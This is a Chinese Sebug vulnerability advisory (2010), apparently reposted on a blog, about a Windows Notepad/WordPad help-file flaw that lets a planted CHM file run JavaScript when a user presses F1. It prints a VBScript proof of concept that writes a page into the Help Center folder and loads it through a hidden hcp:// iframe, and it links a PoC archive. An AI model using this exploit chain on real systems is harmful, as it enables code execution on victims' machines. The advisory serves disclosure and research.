Windows写字板HTML帮助文件处理远程代码执行漏洞

SSV ID: 19278
SEBUG-Appdir: Microsoft Windows
发布时间:2010-03-15
信息提交: liscker (liscker_at_hotmail.com)
影响版本:
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Server Pack 1
Microsoft Windows Server 2003 Server Pack 2
漏洞描述:
写字板是Windows操作系统中附件所提供的简单文本编辑工具。

如果相对路径为参数的话hhctrl.ocx控件的HtmlHelpA()函数就会打开当前目录中的CHM文件。攻击者可以诱骗用户打开与特制notepad.chm文件处于同一目录中的.txt文件,notepad.exe打开该文件后用户在文档中按下F1键获得帮助时就会以本地安全环境执行任意JavaScript代码。

经现场测试,该漏洞不仅适用于 Microsoft Windows XP SP3、Microsoft Windows 2000SP4,同样适用于Microsoft Windows Server 2003 的所有版本,Microsoft Windows XP 及 Microsoft Windows 2003 的其他版本有可能也存在该漏洞。
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
On Error Resume Next
Set a = CreateObject("ADODB.Connection")

 b  = ("Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=//127.0.0.1/C$/;Persist Security Info=False;") 

 a.Open  b
 set rs =CreateObject("ADODB.Recordset")
 rs.Open "SELECT * from liscker.txt", a
 rs.Save "C:/windows/pchealth/helpctr/vendors/CN=Microsoft Corporation,L=Redmond,S=Washington,C=US/bugrep.htm"
 rs.close
document.write "<iframe src=hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/bugrep.htm height=0 width=0></iframe>"
SEBUG安全建议:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/
// sebug.net [2010-03-17]

http://www.secumania.net/include/files/notepadpoc.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值